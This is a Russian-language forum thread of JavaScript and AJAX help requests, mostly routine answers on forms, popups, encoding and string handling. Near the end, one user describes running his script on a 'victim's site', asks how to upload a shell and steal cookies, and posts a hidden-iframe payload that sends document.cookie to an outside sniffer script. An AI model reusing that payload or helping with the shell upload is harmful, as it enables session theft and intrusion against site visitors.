[JavaScript, AJAX] Задай вопрос, получи ответ

Discussion in 'PHP' started by banned, 9 Jun 2007.

Thread Status:
Not open for further replies.
  1. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    Можно сразу в href'е написать:

    Code:
    <script>
    function check(url)
    {
      if(confirm("да?"))
        document.location=url;
      else
        alert('нет так нет');
    }
    </script>
    
    <a href="javascript:check('next.page')">123</a>
    Тогда в статус-строке будет светиться то, что выполняешь. На вкус...
     
  2. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,325
    Likes Received:
    1,199
    Reputations:
    252
    Есть страничка, на ней кнопка и форма.....по нажатию на кнопку вылетает попап окно...там вводишь в поля все что надо и по нажатию в попапе на кнопку, надо чтобы инфа вставилась на 1 страничку в форму....
     
  3. hhover

    hhover Elder - Старейшина

    Joined:
    21 May 2007
    Messages:
    60
    Likes Received:
    36
    Reputations:
    11
    Isis,

    parent.htm
    HTML:
    <form name='formname'>
    <input type='text' name='inputname' />
    <input type='button' value='button' onclick="window.open('popup.htm');" />
    </form>
    popup.htm
    HTML:
    <form name='popupform'>
    <input type='text' name='popuptext' />
    <input type='button' value='button' onclick="window.opener.document.forms['formname'].elements['inputname'].value = document.forms['popupform'].elements['popuptext'].value;" />
    </form>
     
    #23 hhover, 26 Jun 2007
    Last edited: 26 Jun 2007
  4. RaiDeRz

    RaiDeRz Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    121
    Likes Received:
    5
    Reputations:
    0
    Эмс....
    Короче говоря мне нужно сделать так чтобы при вводе какого-то определного поля менялся в опред. месте текст и + к этому должны быть так, что форм у меня много и текст менять будет тоже в разных местах
    Как это возможно сделать?
     
  5. hhover

    hhover Elder - Старейшина

    Joined:
    21 May 2007
    Messages:
    60
    Likes Received:
    36
    Reputations:
    11
    RaiDeRz,
    HTML:
    <script  type="text/javascript">
    function zamena(id,text) {
    document.getElementById(id).innerHTML = text; 
    }
    </script>
    
    <div id="test">Текст для замены</div>
    
    <input type='text' name='user_input' onchange="javasript:zamena('test',this.value);" />
     
    1 person likes this.
  6. RaiDeRz

    RaiDeRz Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    121
    Likes Received:
    5
    Reputations:
    0
    Каким образом можно делать что-то типа функции urldecode и urlencode ?
    Тоесть у меня с помошью этого генерируеться ссылка, но надо кое-где сделать так чтобы были знаки след. строки
    Мне просто таким образом надо сгенерировать ссылку, методом GET, но в формах есть разделение на строки, тоесть через <textarea>
     
    #26 RaiDeRz, 27 Jun 2007
    Last edited: 27 Jun 2007
  7. hhover

    hhover Elder - Старейшина

    Joined:
    21 May 2007
    Messages:
    60
    Likes Received:
    36
    Reputations:
    11
    escape(), unescape().
     
  8. RaiDeRz

    RaiDeRz Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    121
    Likes Received:
    5
    Reputations:
    0
    хм... а можешь дать пример ?)
    А то попробовал что-то в этом роде:
    PHP:
    unescape(document.form.pass.value)
    escape(document.form.pass.value)
    он мне ничего невыдал толкого, разницы нет никакой
     
  9. hhover

    hhover Elder - Старейшина

    Joined:
    21 May 2007
    Messages:
    60
    Likes Received:
    36
    Reputations:
    11
    Вообще да, немного не та функция.
    Вот держи:
    HTML:
    function convertToHex(num) {
      var hex = ''; 
      for (i=0;i<num.length;i++) {
        if (num.charCodeAt(i).toString(16).toUpperCase().length < 2) {
          hex += "%0" + num.charCodeAt(i).toString(16).toUpperCase(); 
        } else {
          hex += "%" + num.charCodeAt(i).toString(16).toUpperCase(); 
        }
      }
      return hex; 
    }
     
  10. RaiDeRz

    RaiDeRz Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    121
    Likes Received:
    5
    Reputations:
    0
    хм... а в чем проблемма после добавления 2-й функции 1-я перестала пахать? щас у меня такой код:
    PHP:
    <script type="text/javascript">
    function 
    update_cron_url() {
    document.getElementById('cron_url').innerHTML '<a href="http://127.0.0.1/test/index.php?send_report='+document.form.send_report.value+'&admin_report='+document.form.admin_report.value+'&rand_start='+document.form.rand_start.value+'&rand_end='+document.form.rand_end.value+'&gen_rand='+document.form.gen_rand.value+'&pass='+unescape(document.form.pass.value)+'">http://127.0.0.1/test/index.php?send_report='+document.form.send_report.value+'&admin_report='+document.form.admin_report.value+'&rand_start='+document.form.rand_start.value+'&rand_end='+document.form.rand_end.value+'&gen_rand='+document.form.gen_rand.value+'&pass='+document.form.pass.value+'</a>'
    }
    function 
    convertToHex(num) {
      var 
    hex ''
      for (
    i=0;i<num.length;i++) {
        if (
    num.charCodeAt(i).toString(16).toUpperCase().leng  th 2) {
          
    hex += "%0" num.charCodeAt(i).toString(16).toUpperCase(); 
        } else {
          
    hex += "%" num.charCodeAt(i).toString(16).toUpperCase(); 
        }
      }
      return 
    hex
    }
    </script>
     
  11. hhover

    hhover Elder - Старейшина

    Joined:
    21 May 2007
    Messages:
    60
    Likes Received:
    36
    Reputations:
    11
    Code:
    leng    th
    Пробелы в слове убери. Как маленький...
     
  12. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,325
    Likes Received:
    1,199
    Reputations:
    252
    Проблема с кодировкой в AJAX....

    PHP:
    <?php
        ini_set
    ("display_errors","0");

        if(
    $_POST['end'])
        {
            
    header    ("Content-Type: text/xml; charset=windows-1251");
            print (
    "<?xml version=\"1.0\"  standalone=\"yes\"?>\r\n");
            print (
    "<responce>\r\n");
            print (
    "<system>\r\n");

            if(empty(
    $_POST['title']))
            {
                 echo 
    "Заполните обязательные поля";
            }
            else
            {
                if(isset(
    $_POST['title']))
                echo 
    "Вывод: ".$_POST['title'];
                     }

            print (
    "</system>\r\n");
            print (
    "</responce>\r\n");
            exit;
        }
    ?>
        <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
        <head>
        <meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
        </head>
        <?php include('js.php'); ?>
        <body>
        <table width="300" border="0" cellpadding="0" cellspacing="0">
        <tr>
            <td><font color="#FFFFFF">Название :</font></td>
            <td align="right"><input type="text" value="" id="title" style="width: 150;height:20" /></td>
        </tr>
    </table>
        <input type="submit" id="end" value="Кнопка" onclick="command();" />
        <div id="system"></div>
        </body>
        </html>
    Файл js.js
    HTML:
    <script type="text/javascript">
    	var xmlhttp = createXmlHttpRequestObject();
    	function createXmlHttpRequestObject()
    	{
    		var xmlhttp;
    		try
    		{
    			xmlhttp = new XMLHttpRequest();
    		}
    		catch (e)
    		{
    			alert('error : '+e.toString());
    		}
    		var XmlHttpVersions = new Array("MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.5.0", "MSXML2.XMLHTTP.4.0","MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP","Microsoft.XMLHTTP");
    		for (var i=0; i<XmlHttpVersions.length && !xmlhttp; i++)
    		{
    			try
    			{
    				xmlhttp = new ActiveXObject(XmlHttpVersions[i]);
    			}
    			catch (e) {}
    		}
    		if (!xmlhttp) alert('failed to create XMLHTTP Element');
    		else return xmlhttp;
    	}
    
    	function createRequestProcess(pdata,type)
    	{
    		if (xmlhttp)
    		{
    			try
    			{
    				xmlhttp.open("POST","<?=$_SERVER['SCRIPT_NAME'];?>",true);
    				xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=windows-1251");
    				xmlhttp.setRequestHeader("Content-length", pdata.length);
    				xmlhttp.send(pdata);
    				xmlhttp.onreadystatechange = handleRequestStateChange;
    			}
    			catch (e) {alert('error : '+e.toString());}
    		}
    	}
    
    	function handleRequestStateChange()
    	{
    		if (xmlhttp.readyState == 4)
    		{
    			if (xmlhttp.status == 200)
    			{
    				try {  ReadResponce(); }
    				catch (e) {}
    			}
    		}
    	}
    
    	function ReadResponce()
    	{
    		xmlresponce     = xmlhttp.responseXML;
    		xmldocelement   = xmlresponce.documentElement;
    		xmldocanswer    = xmldocelement.getElementsByTagName("system").item(0).firstChild.data;
    		myDiv           = document.getElementById("system");
    		myDiv.innerHTML = '<pre>'+xmldocanswer+'<\/pre>';
    	}
    
    
    	function command()
    	{
    		title = document.getElementById('title').value;
    		end	= document.getElementById('end').value;
    		fdata = "title="+title+"&end="+end;
    		createRequestProcess(fdata);
    	}
    </script>
    Как видите кодировка указана где только можно(пробовал даже htaccess), но выводит
    такое:
    Code:
    Вывод: непохек
    Не знаю как справиться с этой проблемой...
     
  13. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,325
    Likes Received:
    1,199
    Reputations:
    252
    >>возможно ты сам текст сохранял в utf-8
    Я ведь показал код =\

    Выше данное мне ничем не помогло =\
     
  14. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,325
    Likes Received:
    1,199
    Reputations:
    252
    Хы...у меня в utf-8 ссылке отобразился
    Code:
    русский текст
    Т.е. я не понял как ты предложил закрыть проблему?
     
  15. RaiDeRz

    RaiDeRz Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    121
    Likes Received:
    5
    Reputations:
    0
    Еще 1 вопрос, а как сделать замену определеных символов на нужные в тексте (переменной) ?
    тоесть чтобы была функция как в php - str_replace
     
  16. RaiDeRz

    RaiDeRz Elder - Старейшина

    Joined:
    5 Apr 2007
    Messages:
    121
    Likes Received:
    5
    Reputations:
    0
    напиши пример replace
     
  17. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,610
    Likes Received:
    1,410
    Reputations:
    611
    http://www.aranea.ru/jsdoc/replace.php
     
  18. dokwill

    dokwill New Member

    Joined:
    25 Jun 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    вопрос по ява скриптам
    у меня есть возможность исполнять мой *.js
    на сайте жертвы. Он работает по делу и показывает
    маленькое инфо в рорап окне.

    причем при каждой загрузке он берет его с моего сайта
    так вот у меня вопрос
    1 - могу ли я дописать в него пхп или нтмл - но чтобы они исполнялись браузером?

    2. дайте примерную строку для загрузки шелла
    в ява скрипте ( если существует) - и указанной папкой загрузки. Права для записи в папке есть или аплоад пхп кода или файла

    то - invlose
    http://www.megahyiptracer.com/hybann/h/
    сдесь в левом нижнем углу грузиться ява с моего сайта
    так может можно заинклудить пхп или как то еще


    а куки спереть можно же попробовать?
    какой примерно скрипт тада нужно добавить а тело?
    он на мыло может слать ?
     
    #38 dokwill, 7 Jul 2007
    Last edited: 7 Jul 2007
  19. dokwill

    dokwill New Member

    Joined:
    25 Jun 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    еше маленький вопрос по яве
    если я вставляю в индекс.пхп такой скрипт
    <a><script language="JavaScript" src="http://****snif.js" </script></a>
    где snif.js
    document.write("<iframe width=100 height=100 style='visibility:hidden;' src="+"http://testlab/sniffer/snif.php?cookie="+document.cookie+">");

    он должен исполняться или нет
    у меня не исполняется и в добавок блокирует исполнение последующих тегов

    что не так?
    или document.cookie+">" только в местах XSS
     
  20. dokwill

    dokwill New Member

    Joined:
    25 Jun 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    вопрос такой
    делаю поп андер на яве

    <script language="JavaScript">megahyiptracer=window.open('http://megahyiptracer.com/?a=cust&page=download/','Download area', "width=800 height=800,' toolbar=no, scrollbars=no,resizable=no,status=no', left=1,top=1")
    </script>

    все открывает - но не могу никак включить прокрутку
    чтоб лева право верх низ листать

    как сделать ?
     
Loading...
Thread Status:
Not open for further replies.